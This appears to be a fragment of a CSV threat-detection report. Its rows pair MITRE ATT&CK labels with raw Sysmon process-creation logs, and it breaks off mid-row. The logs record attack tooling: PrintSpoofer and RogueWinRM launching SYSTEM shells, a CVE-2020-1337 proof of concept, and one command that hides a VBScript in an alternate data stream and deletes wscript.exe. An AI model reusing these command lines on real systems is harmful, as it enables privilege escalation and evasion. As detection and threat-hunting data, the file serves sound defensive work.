+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-02 18:01:54.866</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
+    <Data Name=""ProcessId"">1428</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">PowerShell.EXE</Data>
+    <Data Name=""CommandLine"">powershell.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010ECCBC200</Data>
+    <Data Name=""ParentProcessId"">6760</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe</Data>
+    <Data Name=""ParentCommandLine"">PrintSpoofer.exe  -i -c powershell.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-02T18:01:54.867394Z"">
+    </TimeCreated>
+    <EventRecordID>110434</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3068"" ThreadID=""2232"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-02 18:01:54.866</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
+    <Data Name=""ProcessId"">1428</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">PowerShell.EXE</Data>
+    <Data Name=""CommandLine"">powershell.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010ECCBC200</Data>
+    <Data Name=""ParentProcessId"">6760</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe</Data>
+    <Data Name=""ParentCommandLine"">PrintSpoofer.exe  -i -c powershell.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:48:45.243751Z"">
+    </TimeCreated>
+    <EventRecordID>348</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:48:45.193</Data>
+    <Data Name=""ProcessGuid"">747F3D96-292D-5E1E-0000-0010F5597D00</Data>
+    <Data Name=""ProcessId"">3828</Data>
+    <Data Name=""Image"">C:\Windows\explorer.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.348 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Explorer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">EXPLORER.EXE</Data>
+    <Data Name=""CommandLine"">explorer ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-292D-5E1E-0000-0020CD587D00</Data>
+    <Data Name=""LogonId"">0x7d58cd</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
+    <Data Name=""ParentProcessId"">4612</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:48:45.243751Z"">
+    </TimeCreated>
+    <EventRecordID>348</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:48:45.193</Data>
+    <Data Name=""ProcessGuid"">747F3D96-292D-5E1E-0000-0010F5597D00</Data>
+    <Data Name=""ProcessId"">3828</Data>
+    <Data Name=""Image"">C:\Windows\explorer.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.348 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Explorer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">EXPLORER.EXE</Data>
+    <Data Name=""CommandLine"">explorer ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-292D-5E1E-0000-0020CD587D00</Data>
+    <Data Name=""LogonId"">0x7d58cd</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
+    <Data Name=""ParentProcessId"">4612</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-05T20:43:58.451314Z"">
+    </TimeCreated>
+    <EventRecordID>2164892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5424"" ThreadID=""6708"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-05 20:43:58.450</Data>
+    <Data Name=""ProcessGuid"">00247C92-858E-5F7B-0000-0010E741202B</Data>
+    <Data Name=""ProcessId"">6636</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\windows\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
+    <Data Name=""LogonId"">0x391e334</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-858E-5F7B-0000-00105241202B</Data>
+    <Data Name=""ParentProcessId"">18404</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\Taskmgr.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\windows\system32\taskmgr.exe</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN &quot;Microsoft\Windows\Windows Error Reporting\QueueReporting&quot; &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:06:03.487498Z"">
+    </TimeCreated>
+    <EventRecordID>342414</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:06:03.484</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E93B-5F33-0000-0010C1B40E00</Data>
+    <Data Name=""ProcessId"">7888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c schtasks /run /TN &quot;Microsoft\Windows\Windows Error Reporting\QueueReporting&quot; &gt; nul 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
+    <Data Name=""LogonId"">0x41c24</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
+    <Data Name=""ParentProcessId"">7820</Data>
+    <Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
+    <Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:45.087155Z"">
+    </TimeCreated>
+    <EventRecordID>243570</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:45.082</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F7D-5E75-0000-00104E062100</Data>
+    <Data Name=""ProcessId"">2484</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9F77-5E75-0000-001090F32000</Data>
+    <Data Name=""ParentProcessId"">2416</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-24T01:13:50.327170Z"">
+    </TimeCreated>
+    <EventRecordID>196371</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2812"" ThreadID=""3656"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-24 01:13:50.301</Data>
+    <Data Name=""ProcessGuid"">747F3D96-CA4E-5EC9-0000-00109FE23700</Data>
+    <Data Name=""ProcessId"">1516</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-BDD1-5EC9-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-CA4B-5EC9-0000-0010B8CB3700</Data>
+    <Data Name=""ParentProcessId"">3960</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe</Data>
+    <Data Name=""ParentCommandLine"">RogueWinRM.exe  -p c:\Windows\System32\cmd.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-20T08:07:48.909935Z"">
+    </TimeCreated>
+    <EventRecordID>8114</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2020"" ThreadID=""2088"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-20 08:07:48.894</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3ED4-5D0B-0000-00106C871A00</Data>
+    <Data Name=""ProcessId"">888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;cmd&quot;</Data>
+    <Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
+    <Data Name=""LogonId"">0x13529</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
+    <Data Name=""ParentProcessId"">816</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:06:02.552084Z"">
+    </TimeCreated>
+    <EventRecordID>342413</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:06:02.548</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E93A-5F33-0000-001014B30E00</Data>
+    <Data Name=""ProcessId"">7868</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
+    <Data Name=""LogonId"">0x41c24</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
+    <Data Name=""ParentProcessId"">7820</Data>
+    <Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
+    <Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot;  /C &quot;echo Dim objShell:Dim oFso:Set oFso = CreateObject(&quot;Scripting.FileSystemObject&quot;):Set objShell = WScript.CreateObject(&quot;WScript.Shell&quot;):command = &quot;powershell.exe&quot;:objShell.Run command, 0:command = &quot;C:\Windows\System32\cmd.exe /c &quot;&quot;start /b &quot;&quot;&quot;&quot; cmd /c &quot;&quot;timeout /t 5 &gt;nul&amp;&amp;del C:\Windows\wscript.exe&amp;&amp;del C:\Windows\wscript.exe.manifest&quot;&quot;&quot;&quot;&quot;:objShell.Run command, 0:Set objShell = Nothing &gt; &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
